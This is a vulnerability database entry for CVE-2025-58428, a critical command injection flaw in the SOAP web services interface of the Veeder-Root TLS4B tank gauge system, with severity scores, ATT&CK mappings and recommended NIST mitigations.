CVE-2025-58428
Published: 23 October 2025
Summary
CVE-2025-58428 is a critical-severity Command Injection (CWE-77) vulnerability in Veeder (inferred from references). Its CVSS base score is 9.4 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 19.3% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 AC-6 (Least Privilege) and SI-10 (Information Input Validation).
Deeper analysis
The TLS4B ATG system contains a command injection vulnerability (CWE-77) in its SOAP-based interface, which is exposed through the web services handler. The flaw affects the underlying Linux environment and carries a CVSS 4.0 score of 9.4, reflecting network-accessible exploitation with low attack complexity and valid credentials required.
An authenticated remote attacker can supply crafted SOAP requests to execute arbitrary system-level commands, obtain a full interactive shell, and use the compromised host as a foothold for lateral movement inside the network.
CISA advisory ICSA-25-296-03 and vendor notices from Veeder-Root direct administrators to apply the remediation steps and updated software packages available on the Veeder downloads portal. The associated EPSS score has remained flat at 0.0138 with no observed increase after disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-35717
Vulnerability details
The TLS4B ATG system's SOAP-based interface is vulnerable due to its accessibility through the web services handler. This vulnerability enables remote attackers with valid credentials to execute system-level commands on the underlying Linux system. This could allow the attacker to…
more
achieve remote command execution, full shell access, and potential lateral movement within the network.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Command injection in exposed SOAP web service enables exploitation of public-facing application (T1190) for remote Unix shell command execution (T1059.004).
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly mitigates the command injection vulnerability by requiring timely application of vendor patches or updates as specified in CISA ICSA-25-296-03.
Prevents exploitation of the SOAP interface command injection by validating and sanitizing all information inputs, including command messages.
Limits the impact of exploitation by ensuring the web services handler and underlying Linux processes operate with least privilege, restricting system-level command execution.